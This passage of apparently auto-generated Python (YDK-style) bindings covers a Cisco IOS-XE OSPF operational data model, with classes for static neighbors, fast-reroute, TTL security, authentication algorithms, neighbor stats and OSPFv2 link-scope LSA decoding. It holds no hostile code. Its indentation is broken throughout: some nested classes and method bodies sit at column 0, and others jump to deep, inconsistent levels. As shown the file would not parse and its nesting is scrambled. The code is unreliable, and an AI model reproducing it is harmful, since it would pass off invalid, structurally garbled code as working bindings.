            ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
            ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
            ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])),
        ])
        self.address = None
        self.cost = None
        self.poll_interval = None
        self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for address/cost/poll-interval leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value)
class FastReroute(Entity):
    """Singleton 'fast-reroute' container under ospf-interface: IP-FRR flags."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata for the 'fast-reroute' container, then freeze.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__()
        self.yang_name = "fast-reroute"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])),
            ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
            ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])),
        ])
        self.candidate_disabled = None
        self.enabled = None
        self.remote_lfa_enabled = None
        self._segment_path = lambda: "fast-reroute"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for the three boolean leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value)
class TtlSecurity(Entity):
    """Singleton 'ttl-security' container under ospf-interface: enabled flag and hop count."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata for the 'ttl-security' container, then freeze.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__()
        self.yang_name = "ttl-security"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
            ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])),
        ])
        self.enabled = None
        self.hops = None
        self._segment_path = lambda: "ttl-security"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for enabled/hops leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value)
class Authentication(Entity):
    """Singleton 'authentication' container under ospf-interface.

    Holds SA / key-chain / key-string / no-auth leafs and the nested
    'crypto-algorithm-val' container of per-algorithm empty leafs.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata and eagerly instantiate the singleton
        # crypto-algorithm-val child before freezing.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__()
        self.yang_name = "authentication"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))])
        self._leafs = OrderedDict([
            ('sa', (YLeaf(YType.str, 'sa'), ['str'])),
            ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])),
            ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])),
            ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
        ])
        self.sa = None
        self.key_chain = None
        self.key_string = None
        self.no_auth = None
        self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal()
        self.crypto_algorithm_val.parent = self
        self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val"
        self._segment_path = lambda: "authentication"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for the four authentication leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value)

    class CryptoAlgorithmVal(Entity):
        """Nested 'crypto-algorithm-val' container: one YType.empty leaf per supported algorithm."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            # All leafs are 'empty' typed — presence indicates the algorithm.
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__()
            self.yang_name = "crypto-algorithm-val"
            self.yang_parent_name = "authentication"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])),
                ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])),
                ('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])),
                ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])),
                ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])),
                ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])),
                ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])),
                ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])),
            ])
            self.hmac_sha1_12 = None
            self.hmac_sha1_20 = None
            self.md5 = None
            self.sha_1 = None
            self.hmac_sha_1 = None
            self.hmac_sha_256 = None
            self.hmac_sha_384 = None
            self.hmac_sha_512 = None
            self._segment_path = lambda: "crypto-algorithm-val"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validated assignment for the algorithm presence leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value)
class OspfNeighbor(Entity):
    """'ospf-neighbor' list entry under ospf-interface, keyed by neighbor-id.

    Carries neighbor address, DR/BDR and FSM state leafs plus a nested
    'stats' container with event and retransmission-queue counters.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata, eagerly instantiate the singleton stats child,
        # then freeze the entity.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__()
        self.yang_name = "ospf-neighbor"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['neighbor_id']
        self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))])
        self._leafs = OrderedDict([
            ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])),
            ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
            ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
            ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
            ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
        ])
        self.neighbor_id = None
        self.address = None
        self.dr = None
        self.bdr = None
        self.state = None
        self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats()
        self.stats.parent = self
        self._children_name_map["stats"] = "stats"
        self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for the neighbor leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value)

    class Stats(Entity):
        """Nested 'stats' container: neighbor event count and retransmission queue length."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            # Register metadata for the 'stats' container, then freeze.
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__()
            self.yang_name = "stats"
            self.yang_parent_name = "ospf-neighbor"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])),
                ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])),
            ])
            self.nbr_event_count = None
            self.nbr_retrans_qlen = None
            self._segment_path = lambda: "stats"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validated assignment for the two counters.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value)
class IntfLinkScopeLsas(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'intf-link-scope-lsas' list entry keyed by lsa-type; holds the
    # link-scope and area-scope LSA child lists.
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__()
    self.yang_name = "intf-link-scope-lsas"
    self.yang_parent_name = "ospf-interface"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['lsa_type']
    self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))])
    self._leafs = OrderedDict([
        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
    ])
    self.lsa_type = None
    self.link_scope_lsa = YList(self)
    self.area_scope_lsa = YList(self)
    self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for the 'lsa_type' key leaf.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'link-scope-lsa' list entry keyed by (lsa-id, adv-router). Registers
    # a large fan-out of OSPFv2/OSPFv3 LSA decode children plus raw-data
    # leafs for LSAs that could not be decoded.
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__()
    self.yang_name = "link-scope-lsa"
    self.yang_parent_name = "intf-link-scope-lsas"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['lsa_id','adv_router']
    self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
    self._leafs = OrderedDict([
        ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
        ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
        ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
        ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
        ('version', (YLeaf(YType.uint32, 'version'), ['int'])),
        ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
    ])
    self.lsa_id = None
    self.adv_router = None
    self.decoded_completed = None
    self.raw_data = []
    self.version = None
    self.router_address = None
    # Singleton decode containers, instantiated eagerly and re-parented.
    self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
    self.ospfv2_lsa.parent = self
    self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
    self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
    self.ospfv3_lsa_val.parent = self
    self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
    self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv()
    self.tlv.parent = self
    self._children_name_map["tlv"] = "tlv"
    self.ospfv2_link = YList(self)
    self.ospfv2_topology = YList(self)
    self.ospfv2_external = YList(self)
    self.ospfv2_unknown_tlv = YList(self)
    self.ospfv3_link = YList(self)
    self.ospfv3_prefix_list = YList(self)
    self.ospfv3_ia_prefix = YList(self)
    self.multi_topology = YList(self)
    self.unknown_sub_tlv = YList(self)
    # Segment path embeds both list keys as XPath predicates.
    self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for the link-scope LSA leafs.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
    """Singleton 'ospfv2-lsa' container: decoded OSPFv2 LSA, split into a
    'header' container and an 'lsa-body' container."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata and eagerly instantiate the header and lsa-body
        # singleton children before freezing.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
        self._leafs = OrderedDict()
        self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"
        self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv2-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # No leafs of its own — empty leaf list, validation only.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)

    class Header(Entity):
        """Nested 'header' container: decoded OSPFv2 LSA header fields
        (id, opaque type/id, age, type, advertising router, sequence
        number, checksum, length, flag options)."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            # Register metadata for the 'header' container, then freeze.
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
            self.yang_name = "header"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
            ])
            self.lsa_id = None
            self.opaque_type = None
            self.opaque_id = None
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            # Bits-typed leaf defaults to an empty Bits value, not None.
            self.flag_options = Bits()
            self._segment_path = lambda: "header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validated assignment for the header leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)

    class LsaBody(Entity):
        """Nested 'lsa-body' container: decoded OSPFv2 LSA body with link
        count, summary/external masks, body flags and a nested 'network'
        container."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            # Register metadata and eagerly instantiate the singleton
            # network child before freezing.
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
            self._leafs = OrderedDict([
                ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
            ])
            self.num_of_links = None
            self.summary_mask = None
            self.external_mask = None
            # Bits-typed leaf defaults to an empty Bits value, not None.
            self.body_flag_options = Bits()
            self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"
            self._segment_path = lambda: "lsa-body"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validated assignment for the body leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)

        class Network(Entity):
            """Nested 'network' container: network mask plus the attached-router leaf-list."""

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                # Register metadata for the 'network' container, then freeze.
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                self.yang_name = "network"
                self.yang_parent_name = "lsa-body"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                    ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                ])
                self.network_mask = None
                # Leaf-list defaults to an empty Python list.
                self.attached_router = []
                self._segment_path = lambda: "network"
                self._is_frozen = True

            def __setattr__(self, name, value):
                # Validated assignment for mask and attached-router leafs.
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
                            class Ospfv2Link(Entity):
                                """OSPFv2 router-LSA link: YANG list 'ospfv2-link' keyed by link-id + link-data."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, list keys, leaves, and the per-topology child list."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
                                    self.yang_name = "ospfv2-link"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    # Composite YANG list key: both leaves appear in the segment path below.
                                    self.ylist_key_names = ['link_id','link_data']
                                    self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
                                    self._leafs = OrderedDict([
                                        ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                        ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                                        ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                    ])
                                    self.link_id = None
                                    self.link_data = None
                                    self.type = None
                                    # Child YANG list: per-topology metrics for this link.
                                    self.ospfv2_topology = YList(self)
                                    self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
                                class Ospfv2Topology(Entity):
                                    """Per-topology metric for an OSPFv2 link: YANG list keyed by mt-id."""
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        """Initialize ydk metadata, the mt-id list key, and the metric leaf."""
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
                                        self.yang_name = "ospfv2-topology"
                                        self.yang_parent_name = "ospfv2-link"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = ['mt_id']
                                        self._child_classes = OrderedDict([])
                                        self._leafs = OrderedDict([
                                            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                        ])
                                        self.mt_id = None
                                        self.metric = None
                                        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        """Route writes through ydk so YLeaf values are updated in place."""
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                            class Ospfv2Topology(Entity):
                                """Per-topology data of a link-scope LSA: YANG list 'ospfv2-topology' keyed by mt-id."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the mt-id list key, and the metric leaf."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
                                    self.yang_name = "ospfv2-topology"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['mt_id']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                        ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                    ])
                                    self.mt_id = None
                                    self.metric = None
                                    self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                            class Ospfv2External(Entity):
                                """OSPFv2 external-LSA data: YANG list 'ospfv2-external' keyed by mt-id."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the mt-id list key, and external-route leaves."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
                                    self.yang_name = "ospfv2-external"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['mt_id']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                    ])
                                    self.mt_id = None
                                    self.metric = None
                                    self.forwarding_address = None
                                    self.external_route_tag = None
                                    self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
                            class Ospfv2UnknownTlv(Entity):
                                """Unparsed OSPFv2 TLV: YANG list 'ospfv2-unknown-tlv' keyed by type."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the type list key, and the raw-byte value list."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
                                    self.yang_name = "ospfv2-unknown-tlv"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['type']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                        ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
                                    ])
                                    self.type = None
                                    self.length = None
                                    # leaf-list of uint8: the TLV payload as raw octets.
                                    self.value = []
                                    self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf/YLeafList values are updated in place."""
